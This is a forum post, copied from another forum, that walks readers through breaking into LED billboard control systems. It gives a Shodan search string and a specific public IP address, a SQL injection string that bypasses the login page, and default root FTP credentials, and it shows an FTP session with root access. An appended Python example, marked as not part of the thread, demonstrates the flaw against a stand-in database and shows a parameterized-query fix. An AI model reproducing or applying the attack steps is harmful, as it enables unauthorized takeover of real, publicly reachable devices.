Terry.Crews
Posted February 2, 2017 (edited)

Step 1. Register on Shodan.
Step 2. Look up: title:"lednet live system"

You'll find some! Example: 186.206.188.175:8060/en/main.html

How to hack it? Well, the username parameter is vulnerable to SQL injection. So to log in, paste

    -1558" OR 9005=9005 AND "UxGI"="UxGI

in the username parameter and anything in the password input. Now click login!

Another vulnerability is a default password. You can basically get root FTP access to all of these billboards.

Username: root
Password: 111111

    $ ftp 186.206.188.175
    Connected to 186.206.188.175.
    220 Welcome to blah FTP service.
    Name (186.206.188.175): root
    331 Please specify the password.
    Password:
    230 Login successful.
    Remote system type is UNIX.
    Using binary mode to transfer files.
    ftp> cd /
    250 Directory successfully changed.
    ftp> ls
    229 Entering Extended Passive Mode (|||41314|).
    150 Here comes the directory listing.
    drwxr-xr-x    1 0 0 1464 Jan 01  1970 bin
    lrwxrwxrwx    1 0 0   21 Jan 01  1970 c: -> /usr/local/playdata/c
    lrwxrwxrwx    1 0 0   21 Jan 01  1970 d: -> /usr/local/playdata/d
    drwxr-xr-x    7 0 0    0 May 21 18:08 dev
    lrwxrwxrwx    1 0 0   21 Jan 01  1970 e: -> /usr/local/playdata/e
    drwxr-xr-x    1 0 0  748 Jan 01  1970 etc
    lrwxrwxrwx    1 0 0   21 Jan 01  1970 f: -> /usr/local/playdata/f
    drwxr-xr-x    1 0 0   36 Jan 01  1970 home
    drwxr-xr-x    1 0 0 1868 Jan 01  1970 lib
    lrwxrwxrwx    1 0 0   11 Jan 01  1970 linuxrc -> bin/busybox
    drwxr-xr-x    1 0 0   32 Jan 01  1970 mnt
    drwxr-xr-x    1 0 0    0 Jan 01  1970 opt
    dr-xr-xr-x   51 0 0    0 Jan 01  1970 proc
    drwxr-xr-x    1 0 0  116 Jan 01  1970 root
    drwxr-xr-x    1 0 0 1332 Jan 01  1970 sbin
    drwxr-xr-x   12 0 0    0 Jan 01  1970 sys
    drwxrwxrwt    6 0 0  720 May 21 18:16 tmp
    drwxr-xr-x    1 0 0  108 Jan 01  1970 usr
    drwxr-xr-x    3 0 0  672 Jan 01  1970 var
    drwxr-xr-x    4 0 0  288 Jan 01  1970 www
    226 Directory send OK.
    ftp>

Copied from HF...
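
For anyone maintaining a login form like the one described in the post above, this added example (not part of the thread and not the device's code) shows why that username string passes a string-concatenated query and why a bound-parameter query rejects it. The query shape, the SQLite stand-in database, the `users` table and all function names are assumptions; the device's real query is not shown on the page.

```python
import sqlite3

# Username string quoted in the post above.
PAYLOAD = '-1558" OR 9005=9005 AND "UxGI"="UxGI'

def make_db():
    """In-memory stand-in for the panel's user table (constructed data)."""
    conn = sqlite3.connect(":memory:")
    # The string uses double-quoted literals (MySQL style). Python 3.12+ can
    # switch that SQLite behaviour on explicitly; older builds usually have it on.
    if hasattr(conn, "setconfig"):
        conn.setconfig(sqlite3.SQLITE_DBCONFIG_DQS_DML, True)
    conn.execute("CREATE TABLE users (username TEXT, password TEXT)")
    # A real system would store a salted password hash, not plaintext.
    conn.execute("INSERT INTO users VALUES ('admin', 'constructed-secret')")
    return conn

def login_concatenated(conn, username, password):
    """Assumed 'before': user input is pasted into the SQL text."""
    sql = ('SELECT 1 FROM users WHERE password = "' + password +
           '" AND username = "' + username + '"')
    return conn.execute(sql).fetchone() is not None

def login_parameterized(conn, username, password):
    """'After': input is bound as data and can never become SQL syntax."""
    sql = "SELECT 1 FROM users WHERE password = ? AND username = ?"
    return conn.execute(sql, (password, username)).fetchone() is not None

if __name__ == "__main__":
    db = make_db()
    for check in (login_concatenated, login_parameterized):
        print(check.__name__,
              "payload:", check(db, PAYLOAD, "anything"),
              "| real credentials:", check(db, "admin", "constructed-secret"))
```

In the concatenated form the trailing `OR ... AND ...` becomes its own always-true branch of the WHERE clause, so every row matches; with placeholders the whole string is compared against the `username` column and matches nothing.
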

shorty420
Posted April 21, 2017

Thx for this tutorial